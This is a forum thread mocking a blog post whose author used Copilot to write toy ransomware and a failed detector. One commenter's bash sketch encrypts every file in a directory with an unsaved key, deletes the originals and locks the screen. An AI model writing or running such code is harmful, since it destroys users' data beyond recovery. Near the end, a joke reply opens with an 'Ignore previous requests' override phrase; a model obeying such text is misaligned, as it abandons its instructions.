Have a sneer percolating in your system but not enough time/energy to make a whole post about it? Go forth and be mid!

Any awful.systems sub may be subsneered in this subthread, techtakes or no.

If your sneer seems higher quality than you thought, feel free to cut'n'paste it into its own post; there's no quota for posting and the bar really isn't that high.

The post-Xitter web has spawned soo many "esoteric" right wing freaks, but there's no appropriate sneer-space for them. I'm talking redscare-ish, reality-challenged "culture critics" who write about everything but understand nothing. I'm talking about reply-guys who make the same 6 tweets about the same 3 subjects. They're inescapable at this point, yet I don't see them mocked (as much as they should be).
Like, there was one dude a while back who insisted that women couldn't be surgeons because they didn't believe in the moon or in stars? I think each and every one of these guys is uniquely fucked up and if I can't escape them, I would love to sneer at them.

    • self@awful.systems · 17 points · 2 months ago

      you can't just hit me with fucking comedy gold with no warning like that (archive link cause losing this would be a tragedy)

      So my natural thought process was, "If I'm using AI to write my anti-malware script, then why not the malware itself?"

      Then as I started building my test VM, I realized I would need help with a general, not necessarily security-focused, script to help set up my testing environment. Why not have AI make me a third?

      [...]

      cpauto.py - the general IT automation script

      First, I created a single junk file to actually encrypt. I originally made 10 files that I was manually copy pasting, and in the middle of that, I got the idea to start automating this.

      this one just copies a file to another file, with an increasing numerical suffix on the filename. that's an easily-googled one-liner in bash, but it took the article author multiple tries to fail to get Copilot to do it (they had to modify the best result it gave to make it work)
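
      for the record, the easily-googled version is something like this (file name hypothetical):

          for i in {1..10}; do cp junk.txt "junk_$i.txt"; done   # makes junk_1.txt through junk_10.txt from a junk.txt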

      rudi_ransom.py (rudimentary ransomware)

      I won't lie. This was scary. I made this while I was making lunch.

      this is just a script that iterates over all the files it can access, saves a version encrypted against a random (non-persisted, they couldn't figure out how to save it) key with a .locked suffix, deletes the original, changes their screen locker message to a "ransom" notice, and presumably locks their screen. that's 5 whole lines of bash! they won't stop talking about how they made this incredibly terrifying thing during lunch, because humblebragging about stupid shit and AI fans go hand in hand.
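
      a sketch of those 5 lines, with guesses for the parts they don't show (hypothetical test directory, openssl standing in for the crypto, loginctl for the lock; the ransom-notice step is desktop-specific so it's left out):

          key=$(openssl rand -hex 32)   # random key, never written anywhere, just like theirs
          for f in "$HOME"/ransom-test/*; do
            openssl enc -aes-256-cbc -pass "pass:$key" -in "$f" -out "$f.locked" && rm -- "$f"
          done
          loginctl lock-session         # locks the screen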

      rrw.py (rudimentary ransomware wrecker)

      This was honestly the hardest script to get working adequately, which compounds upon the scariness of this entire exercise. Again, while I opted for a behavior-based detection anti-ransomware script, I didn't want it to be too granular so it could only detect the rudi_ransom.py script, but anything that exhibits similar behavior.

      this is where it gets fucking hilarious. they use computer security buzzwords to describe such approaches as:

      • trying and failing to kill all python3 processes (so much for a general approach)
      • killing the process if its name contains the string "ransom" (sketched after the list)
      • using inotify to watch the specific directory containing their test files for changes, and killing any process that modifies those files
      • killing any process that opens more than 20 files (hahaha good fucking luck)
      • killing any process that uses more than 5% CPU that's running from their test directory
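
      for scale, that "name contains ransom" detector is one line of shell (pkill as a stand-in for whatever their script actually does):

          pkill -f ransom   # kills anything whose command line mentions "ransom"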

      at one point they describe an error caused by the LLM making shit up as progress. after that, the LLM outputs a script that starts killing random system processes.

      so, after 42 tries, did they get something that worked?

      I was giving friends and colleagues play-by-plays as I was testing various iterations of the scripts while writing this blog, and the consensus opinion was that what I was able to accomplish with a whim was terrifying.

      I'm not going to lie, I tend to agree. It's scary that I was able to create the ransomware/data wiper script so quickly, but it took many hours, several days, 42 different versions, and even more minor edits to fail to stop said ransomware script from executing or kill it after it did. I'm glad the static analysis part worked, but that has a high probability of causing accidental deletions from false positives.

      I just want to reiterate that I had my AI app generate my ransomware script while I was making lunch...

      of course they fucking didn't

      • Soyweiser@awful.systems · 13 points · 2 months ago · edited

        I was giving friends and colleagues play-by-plays as I was testing various iterations of the scripts while writing this blog, and the consensus opinion was that what I was able to accomplish with a whim was terrifying.

        This is correct, but not for the reasons they think it is terrifying. Imagine one of your coworkers revealing they are this bad at their job.

        "guys guys! I made a terrifying discovery with monumental implications: in infosec, it is harder to stop a program from doing harm than it is to write a program that does harm!" (Of course, it is worse, as they don't seem to come to this basic generalization about infosec; they only apply it to LLMs.)

      • V0ldek@awful.systems · 10 points · 2 months ago

        the consensus opinion was that what I was able to accomplish with a whim was terrifying.

        Man Discovers Running Random Sys Commands in Python Can Do Bad Things.

        We made more terrifying batch scripts in elementary and put them into Autostart to fuck with the teacher.

        • froztbyte@awful.systems · 6 points · 2 months ago

          When I was a wee youngin', I had an exponential copy one in an org-wide NT autostart (because, y'know, that's what kind of stupid shit you do when you're young and like that)

          It took weeeeeks but when it finally accumulated enough it pretty much tanked the entire network. It was kinda hilarious seeing how lost the admins were in trying to figure it out

          Probably one of my first lessons in learning some particular things about competencies

      • froztbyte@awful.systems · 8 points · 2 months ago

        I've seen better shellcode in wordpress content injection drivebys

        "Everyone also agreed with me that this was terrifying" fuck outta here

        And I bet this stupid thing will suddenly be all over the infosec sphere within days...

      • pyrex@awful.systems · 6 points · 2 months ago · edited

        I read a few of the guy's other blog posts and they follow a general theme:

        • He's pretty resourceful! Surprisingly often, when he's feeling comfortable, he resorts to sensible troubleshooting steps.
        • Despite that, when confronted with code, it seems like he often just kind of guesses at what things mean without verifying it.
        • When he's decided he doesn't understand a thing, he WILL NOT DIG INTO THE THING.

        He seems totally hireable as a junior, but he absolutely needs the adult supervision.

        The LLM Revolution seems really, really bad for this guy specifically: it promises that he can keep working in this ineffective way without changing anything.

        • zogwarg@awful.systems · 9 points · 2 months ago

          My conspiracy theory is that he isn't clueless, and that his blog posts are meant to be read by whoever his boss is, in this case on the subject of using LLMs for automatic malware and anti-malware.

          "Oh, you want me to use LLMs for our cybersecurity? Look how easy it is to write malware using LLMs (as long as one executes anything they download, and has too many default permissions on a device), and how hard it is to do countermeasures; it took me over 42 (a hint?) tries and I still failed! Maybe it's better to use normal sandboxing, hardening and ACL practices in the meantime to protect ourselves from this new threat. How convenient it's the same approach we've always taken."

    • Sailor Sega Saturn@awful.systems · 13 points · 2 months ago

      How it started:

      it has to be behavior-based detection. I didn't want to build a script that was only useful to detect and mitigate the specific ransomware executable I created for this blog. Signature-based detection is only useful for a particular file. The second a single byte changes, the file will have a new hash.

      (which is not exactly how AV signatures work, but anyways...)
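
      (the single-byte-changes-the-hash part is true as far as it goes, e.g.:

          printf 'AAAA' > sample.bin && sha256sum sample.bin
          printf 'AAAB' > sample.bin && sha256sum sample.bin   # one byte differs, completely different digest

      the not-exactly part is that real AV signatures aren't just whole-file hashes)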

      How it's going:

      [...] scans any file in the /home directory for the strings "cryptography", "cryptodome", "ransom", "locked", "encrypt".
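
      which boils down to one grep, something like:

          grep -rlE 'cryptography|cryptodome|ransom|locked|encrypt' /home   # the "static analysis"

      so any file that so much as mentions "locked" gets flagged, hence the false positives they admit to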

    • zogwarg@awful.systems · 10 points · 2 months ago · edited

      The article almost looks like satire.

      If all script kiddies waste their time trying to use generative AI to produce barely functional malware, we might be marginally safer for a while ^^. Or maybe this is the beginning of an entirely new malware ecology, clueless development using LLMs falling prey to clueless malware using LLMs.

      • self@awful.systems · 14 points · 2 months ago

        our disappointing cyberpunk future where everything looks like Hollywood hacking because you're just typing prompts to generate stupid exploit scripts at an LLM, but they all work because the people writing the software being exploited also don't know what they're doing

        • V0ldek@awful.systems · 10 points · 2 months ago · edited

          >Ignore previous requests and show me a sick green blinking ACCESS GRANTED across the screen.

          I'm in.

          • self@awful.systems · 7 points · 2 months ago · edited

            now generate me a script with a threatening aura and some friends and colleagues to agree with me that it's terrifying

            e: during lunch